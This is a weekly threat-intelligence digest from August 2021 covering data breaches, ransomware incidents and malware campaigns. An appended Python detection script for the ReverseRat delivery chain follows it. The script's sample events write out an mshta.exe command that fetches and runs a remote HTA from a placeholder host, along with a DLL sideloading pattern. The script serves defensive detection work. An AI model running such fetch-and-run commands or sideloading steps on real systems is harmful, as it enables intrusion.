12 August 2021

Silobreaker’s Weekly Cyber Digest is a quantitative summary of our threat reports, published every Thursday. The reports are created using our award-winning intelligence product Silobreaker Online.

Trending Vulnerable Products

Open Source
Name Heat 7
Microsoft Edge
cPanel
Microsoft NET Core
Foxit PhantomPDF
Palo Alto Networks PAN-OS
Deep & Dark Web
Name Heat 7
NVIDIA GeForce Now
Microsoft Exchange Server Enterprise
Cobalt Strike
Linux OS
Google Gmail

The tables show the products which have been mentioned more than usual during the last week in connection with vulnerabilities.

Data Leaks & Breaches

Leaks & Breaches
Company Information Affected
Chamber of Deputies (Luxembourg) The Chamber of Deputies accidentally published the names and addresses of public petition signatories on its website. The data was accessible from at least June 2021 until August 2nd, 2021. 24,000
University of Kentucky (US) The university discovered a vulnerability on its website that may have allowed an unauthorised party to obtain a copy of a College of Education database. The database contained names and email addresses of students and teachers. 335,000
Ibex Limited (US) Ibex reported that a cyberattack originally disclosed in October 2020 led to a data breach that could have impacted information linked to certain employees and their families. An investigation revealed that the threat actors may have accessed data between July 27th and August 17th, 2020. 24,000
Gigabyte Technology (Taiwan) The manufacturer suffered a cyberattack on August 3rd, 2021, that affected a small number of its servers. The operators of RansomEXX ransomware appear to be behind the attack and threatened to leak 112GB of data they claim to have stolen. This includes data from an internal Gigabyte network and an American Megatrends Git repository. Unknown
Ermenegildo Zegna (Italy) The operators of RansomEXX ransomware claim to have stolen 20.74GB of data from the fashion house and leaked 43 archives. Unknown
Vision for Hope (US) The company disclosed that an unauthorised actor accessed an email account belonging to a Hope employee from February 14th to April 2nd, 2021. The account contained names, dates of birth, Social Security numbers, financial account data, medical treatment information, diagnosis information, and more. Unknown
StarHub (Singapore) The telecommunications company discovered its customers’ personal information on a third-party data dump website on July 6th, 2021. The discovered file reportedly contains the mobile numbers, email addresses, and identity card numbers of StarHub subscribers whose memberships date back to before 2007. The origin of the leak is unknown. 57,191
Transamerica Corporation (US) The insurance company suffered a data leak caused by a configuration mistake during a website upgrade on June 14th, 2021. Some clients were able to access information about other companies’ retirement plan contributions. Potentially accessed details include names, addresses, Social Security numbers, dates of birth, and financial details of the retirement plans. Unknown
The New York City Education Department (US) The department disclosed that the academic records and biographical data of the city’s public school students and department staff were inadvertently leaked. At least one student within the public school system was able to access a Google Drive that contained sensitive data. 3,100
Illinois State Police (US) The police confirmed that its Firearm Owners Identification (FOID) card portal was targeted in a cyberattack. The personal information of individuals with FOID cards may have been compromised. 2,000
Chanel Korea The company stated that the personal information of some of its customers was stolen after parts of its database were compromised between August 5th and August 6th, 2021. Personal information stored on the database included customers’ names, birthdays, phone numbers, addresses, sex, email addresses, and product purchase lists. Unknown
SeniorAdvisor (US) WizCase researchers discovered a misconfigured Amazon S3 bucket that exposed the names, emails, and phone numbers of individuals identified as leads. The data appears to date between 2002 and 2013. The bucket also contained around 2,000 anonymous reviews that could be linked to the personal information of the reviewers. 3,000,000
Greenway Health (US) A dark web forum user claims to have encrypted the company’s data on July 15th, 2021, and published 746MB of the data as proof of the attack. The files contained some personal information of individuals. Greenway stated that the company’s former client, and not Greenway, was targeted in the attack. Unknown
Charlotte-Mecklenburg Schools (US) On August 6th, 2021, the school district sent an email to ‘hundreds’ of parents exposing medical information, parents’ phone numbers, and other sensitive student data. 3,000
Crytek (Germany) The company confirmed that it was targeted in a ransomware attack in October 2020. The attack had previously been attributed to the Egregor ransomware group. Documents were stolen in the attack and subsequently leaked. The exposed information included names, job titles, company names, business addresses, phone numbers, and more. Unknown
Electromed Inc (US) The company stated that an unauthorised actor gained access to its systems and stole data on customers and employees. Unknown
Multiple US School Districts Researchers at DataBreaches[.]net identified numerous K-12 school districts hit by Pysa ransomware. The attacks took place in 2020 and 2021. The schools include Affton School District, Gering Public Schools, Palos Community Consolidated School District 118, Brookfield Public Schools, Winters Independent School District, Sheldon Independent School District, Logansport Community School Corporation and Zionsville Community Schools. Unknown
Accenture (Ireland) The global IT consultancy confirmed that it was targeted in a LockBit 2.0 ransomware attack. The attackers claim to have stolen 6TB of data and are demanding $50 million. On August 11th, 2021, the attackers released some stolen files, which primarily consisted of marketing material, and threatened to release more data. Unknown
OT Group (Singapore) The real estate group received an email from a third party claiming to have accessed its IT network. It is currently investigating the nature and extent of the breach. DataBreaches[.]net noted that a comment on its reporting of the breach appears to show the threat actor ALTDOS claiming responsibility for the attack. Unknown

Ransomware mentions in Technology

Time Series

This chart shows the trending ransomware related to the Technology Industry within a curated list of cyber sources over the past week.

Weekly Industry View

Industry View
Industry Information
Banking & Finance Segurança Informática discovered a new Latin American banking trojan, dubbed Warsaw, that uses a customised version of Horus Eyes RAT as its second-stage payload. The remote access trojan allows full control over a victim’s device. The .NET banker Warsaw uses an overlay window mimicking Santander to trick the user into downloading a malicious executable. The researchers found that the name of the Telegram bot creator, Banking171, shows similarities to Anubis171, a name linked to the Brazilian ANUBIS phishing network discovered in December 2020. It is unclear whether the two are connected in some way, but the researchers pointed out that the Warsaw threat actor also originates from Brazil.
Technology Researchers at CrowdStrike reported that the criminal actor PROPHET SPIDER, which has been active since at least May 2017, is exploiting Oracle WebLogic flaws to access target environments. The researchers observed PROPHET SPIDER commonly compromising Linux systems first, then moving into Windows environments with compromised credentials via Telnet, SSH or SMB. In two separate incidents, PROPHET SPIDER intrusions preceded the deployment of Egregor and MountLocker ransomware respectively.
Retail & Hospitality Researchers at RiskIQ identified the infrastructure used by Magecart Group 8. The group, which has been active since 2016, targets the home improvement sector and uses the same skimmer and techniques that RiskIQ first reported on in 2017. The researchers found that the group used bulletproof hosting providers such as Flowspec, JSC TheFirst, and OVH, before transitioning potentially inactive infrastructure to legitimate hosting services such as Velia[.]net, WorldStream, and Amazon. RiskIQ stated that the ‘sheer amount’ of infrastructure used by Magecart Group 8 indicates that the group has been continually successful in its skimming operations.
Cryptocurrency The cross-chain protocol Poly Network was targeted in a cyberattack in which the attackers stole $611 million. According to The Block Research, the attack was the result of a cryptography issue. The attack also impacted the trading pool O3, which suspended its cross-chain functionality. Among the stolen tokens were $273 million in Ethereum, $253 million in tokens on Binance Smart Chain, and $85 million in USDC. The attacker has since returned about half of the stolen funds.
Government Lumen Technologies researchers identified an updated version of ReverseRat, a remote access trojan first observed in use by a suspected Pakistani threat actor in June 2021. Recent attacks targeted at least one government entity and other organisations in Afghanistan, as well as a small number of organisations in Jordan, India and Iran. The malware is delivered via a ZIP file containing a Windows shortcut (LNK) file that fetches an HTA file from a compromised WordPress site. Once decoded and executed, the file drops a decoy PDF referencing a supposed United Nations briefing session alongside a malicious payload. ReverseRat was previously installed in parallel with the AllaKore agent; in the new version, a different agent, called NightFury, runs before ReverseRat is installed. The malware is executed via DLL sideloading using various Microsoft binaries.

News and information concerning each mentioned industry over the last week.
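The ReverseRat delivery chain described in the Government row (a shortcut that fetches a remote HTA, a decoy PDF, then a payload run by sideloading a DLL into a Microsoft binary) is the kind of sequence that is visible in endpoint process-creation and image-load telemetry. The Python below is an added example, not part of this digest or of Lumen's report: it runs two simple checks over a constructed set of events. The event field names, the hostnames and the paths are assumptions, and treating mshta.exe as the process that pulls the HTA relies on it being the default Windows handler for .hta files, not on anything the report states.

```python
"""
Added example (not from the Silobreaker digest or from Lumen's report).
Two checks over process-creation / image-load events:
  1. mshta.exe launched with a remote .hta URL  (the LNK -> HTA fetch step)
  2. a Microsoft-signed binary running from a user-writable directory
     loads an unsigned DLL from the same kind of path (the sideloading step)
Event schema, signer strings, hosts and paths are assumptions for this example.
"""
import re
from urllib.parse import urlparse

# Constructed sample events; not real telemetry. Field names are assumed.
SAMPLE_EVENTS = [
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://blog-example.invalid/wp-content/uploads/brief.hta"},
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Adobe\Acrobat\Acrobat.exe",
     "cmdline": r'"Acrobat.exe" C:\Users\u\AppData\Local\Temp\UN_briefing.pdf'},
    {"type": "imageload", "image": r"C:\Users\u\AppData\Roaming\Tools\credwiz.exe",
     "loaded": r"C:\Users\u\AppData\Roaming\Tools\DUser.dll",
     "signer": "Microsoft Windows", "loaded_signer": ""},
    {"type": "process", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
]

# Paths a standard user can write to (assumed layout; extend for your estate).
USER_WRITABLE = re.compile(r"^[A-Za-z]:\\(Users|ProgramData|Temp)\\", re.IGNORECASE)
# A URL on the command line ending in .hta
REMOTE_HTA = re.compile(r"(https?://\S+?\.hta)\b", re.IGNORECASE)


def remote_hta_via_mshta(ev):
    """Flag mshta.exe pulling an .hta over HTTP(S). explorer.exe as the parent is
    what a double-clicked shortcut typically looks like; it is recorded, not required."""
    if ev.get("type") != "process":
        return None
    if not ev.get("image", "").lower().endswith("\\mshta.exe"):
        return None
    m = REMOTE_HTA.search(ev.get("cmdline", ""))
    if not m:
        return None
    url = m.group(1)
    return {"rule": "remote_hta_via_mshta", "url": url,
            "host": urlparse(url).hostname, "parent": ev.get("parent")}


def ms_signed_binary_sideload(ev):
    """Flag a Microsoft-signed host binary that lives in a user-writable path and
    loads an unsigned DLL from a user-writable path: the classic sideload shape."""
    if ev.get("type") != "imageload":
        return None
    if ev.get("signer") != "Microsoft Windows":   # trusted host binary (assumed signer string)
        return None
    if ev.get("loaded_signer"):                   # DLL carries a signature; not this pattern
        return None
    if USER_WRITABLE.match(ev.get("image", "")) and USER_WRITABLE.match(ev.get("loaded", "")):
        return {"rule": "ms_signed_binary_sideload",
                "host_binary": ev["image"], "dll": ev["loaded"]}
    return None


RULES = (remote_hta_via_mshta, ms_signed_binary_sideload)


def scan(events):
    """Apply every rule to every event; return the list of hits in event order."""
    hits = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                hits.append(hit)
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_EVENTS):
        print(h)
```

Running the block on the constructed events yields one hit per stage: the mshta.exe fetch of the remote .hta and the unsigned DLL loaded by a Microsoft-signed binary from a user-writable directory. Both checks are deliberately narrow; a local .hta path or a signed DLL does not fire, so tune the path and signer assumptions to your own telemetry before relying on them.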
